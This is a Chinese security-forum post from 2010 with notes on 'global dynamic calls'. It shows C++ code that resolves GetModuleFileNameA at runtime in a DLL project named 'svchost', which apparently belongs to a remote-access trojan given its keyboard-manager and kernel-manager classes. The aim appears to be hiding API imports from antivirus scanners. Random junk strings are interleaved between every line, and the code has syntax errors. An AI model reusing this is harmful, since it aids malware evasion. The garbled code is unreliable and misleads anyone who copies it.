标题:
[原创文章]
全局动态调用
[打印本页]
作者:
ice_xke
时间:
2010-10-19 12:30
标题:
全局动态调用
全局动态调用笔记
( {. f+ c! t6 d, r. _3 x: V) p
svchost files工程->插入->类(Generic Class DTDY)->DTDY.cpp DTDY.h
! i( k% h7 |& i0 n+ y$ q. _8 S
----------------------------------------
& v2 q) {0 Y/ A5 g* p7 @
DTDY.h:
' U8 t+ D1 j" D+ H/ } H
. h, `; ^) z" C' G; x
#if _MSC_VER>1000
6 s% u, J/ x6 m% \% E0 i
#pragma once
& g: F! ~1 ]9 C- `
#endif //_MSC_VER>1000
. W; U, D# U4 y" B2 t; |* m( `6 F
#include<windows.h>
! {$ g, A6 g1 X( T
+ p8 q/ f; Y: E h
typedef DWORD (__stdcall *pGetModuleFileNameA)(HMODULE,LPSTR,DWORD);
1 p# @) b; \. H
class DTDY
2 _# [6 z/ T& Z, G5 J% o8 c
{
, `3 c. C( w4 N* Q D' [5 i
public:
* @+ _# E; z: ~
DTDY();
& M3 X6 n$ K4 `% `2 B
virtual ~DTDY();
# c2 B# `. w6 l( w9 W: ^8 Z
public:
" {/ I* H7 E1 |6 e
static pGetModuleFileNameA MyGetModuleFileName;
. F9 g) T: J9 t1 T) e, Q6 {
static BOOL FunInitiallization();
% ?- @, N9 Z& n. d& |
};
* u' A" ?. F w8 A3 M
#endif
+ B# q- ?, M/ |. R
----------------------------------------
) S3 m, c* C; M) H! H
6 f* m) a& v% o" u$ C1 @$ K0 U6 ^( J
DTDY.cpp:
# B0 K2 Z5 y- ]# T
! \4 r, h/ [, I3 U
#include "DTDY.h"
/ K" C: k1 t# z b) f" F
pGetModuleFileNameA DTDY::MyGetModuleFileName=NULL;
' i. @) U1 K: }% F: q/ i( o
DTDY:TDY()
; c9 e8 D" X) X! H7 w" o) g
{
7 q5 A" d% L* [
}
/ s# D& t" A; {, U! r9 l7 m
DTDY::~DTDY()
& L# j1 J& G; v8 C; E& y
{
4 q/ t" B9 A* u2 h4 R/ C8 a
}
# z* O* K# p J" K- M0 X" X/ W
BOOL DTDY::FunInitiallization()
* P- W. o$ R8 C. j9 r
{
. q0 m# O, H6 e' f v7 t. [
HMODULE hModule=LoadLibrary("kernel32.dll");
3 M" p8 u& ^$ u. a4 C
MyGetModuleFileName=(pGetModuleFileNameA)GetProcAddress(hModule,"GetModuleFileNameA");
) A; L( R+ u" |) x. V0 X
if(!MyGetModuleFileName=) return FALSE;
- Z4 k; P( N# V! y2 z3 N2 ~' z
" i# h! l! m: {# A9 q
return TRUE;
- S/ o9 r/ |! g* P
}
: E+ A/ `5 U$ ^5 W3 Y1 v% I" g
----------------------------------------
8 I( ?: q' ?- I; D# \0 d7 s
svchost.cpp:
; R" q' p( b( T* d' `
P3 ?' z! K6 `" C& Q5 M. g1 s4 b
#include "DTDY.h"
$ K$ r! Y- Z1 f, |( p1 ~
3 ]" |9 H& E7 D( _( s' ]0 T( R
BOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
. L N4 }+ M$ V- W9 e
{
+ K) w5 C8 s; w$ r, P
switch(ul_reason_for_call)
' Z8 }* O+ S. B5 C
{
7 f6 F( s4 G# {; w8 ]3 q
case DLL_PROCESS_ATTACH:
: ?* | I$ U E
if(!DTDY::FunInitiallization()) return FALSE;
3 H) T* a T) y n
7 l/ q/ r" Y+ o/ w: s& m
break;
, z' o' V. n2 c
}
" C# W. J+ r* e n2 G0 X& u
}
" s+ C# a/ U, y7 Q, V
: Z% a8 T; N: t4 k& F; Z
0 E, ~0 h) U0 j5 H4 \; D& \
GetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));->goto def
- X6 {& A, Z/ H/ K4 Y
改写为
y/ G- q4 Q- G: O% ?( H2 }
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));
3 [7 i3 s. t+ `5 _' \, ^
----------------------------------------
, P, y2 \" G3 @
KernelManager.cpp:
+ m0 u1 c- J1 y; W) ?3 J6 N; o
1 b, L' s, B" k( ?$ U, C
#include "../DTDY.h"
$ O. e/ D6 u, d3 d
GetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
2 M% ~3 m5 X d7 F7 s9 l/ S
改写为
3 H( R9 Q @4 Y3 U2 s0 Y
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
; I' i( V& h2 ]
----------------------------------------
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/)
Powered by Discuz! 7.2
